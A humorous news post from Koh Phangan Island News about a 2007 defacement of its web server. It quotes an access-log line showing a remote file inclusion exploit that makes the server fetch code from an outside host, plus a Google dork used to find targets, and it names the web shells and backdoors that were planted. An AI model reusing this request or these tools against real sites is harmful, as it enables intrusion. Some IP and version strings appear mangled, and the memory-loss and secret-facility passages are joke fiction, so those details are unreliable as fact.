A couple of days ago an unidentified Islamic group of Turkish hackers, called StarHack Group, attacked the web server of Koh Phangan Island News website.
Wednesday the 7th of March 2007 at precisely 20:18 hours and 52 seconds an unknown attacker with the IP address of 22.214.171.124 executed an exploit for the postguestbook module with the following request:
126.96.36.199 – – [07/Mar/2007:20:18:52 +0100] “GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= http://188.8.131.52/.smile/kgb.c? HTTP/1.1” 200 1808 “-” “libwww-perl/5.79”
According to most recent research the attack was initiated by a so called robot that searches google.com for specific vulnerable targets.
184.108.40.206 – – [08/Mar/2007:19:21:25 +0100] “GET /modules.php?op=modload&name=postguestbook&file=index HTTP/1.1” 302 – “http://www.google.com/search?q= %22by:+PostGuestbook%22+site:org&hl=en&client= firefox-a&rls=org.mozilla:en-US:official&start=10&sa=N” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:220.127.116.11) Gecko/20060728 Firefox/18.104.22.168”
The exploit for the postguestbook module allows the hacker to include arbitrary PHP code from an external source and execute it with the local user rights of the Apache web server.
Finally the hackers from StarHack Group were able to upload files into the web server directory and overwrite the index files on most domains, a technique called website defacing. Amongst the uploaded files from different internet sources were some pretty nice and powerful PHP scripts like c99shell and r57shell. Furthermore an IRC Bot named Eggdrop and a small httpd binary to run a tiny web server. Additionally, a few tiny Perl scripts to open up a backdoor on a specific port on the server where it listens and waits for further instructions.
Last but not least also a 720 MB movie file named, Rosso Come Il Cielo, was illegally uploaded to Phangan Islands News web server. Unfortunately only in Italian language and subtitles are still missing.
Phangan Island News officials announced that no further serious damage was done to the server in the recent hacker attacks. All systems are up and running 24/7 with no further complications and will constantly be monitored by Phangan Island News Special Internet Security Task Force.
An informed source noted that human failure was again one of the major factors for the recent successful hacker attack.
The informed source added that system admin Becki Beckmann, who is responsible for securing the server with IP address 22.214.171.124, experienced a sudden and very strange memory loss due to some electrical blackouts while joining a brain improvement program at Phangan Island News research facilities.
Unfortunately Becki Beckmann still refuses to give any more official statements on the subject of human failure concerning the successful recent hacker attack.
Phangan Island News Headquarter still strictly denies the existence of any hidden research facilities here on Koh Phangan Island – The Island Of Madness.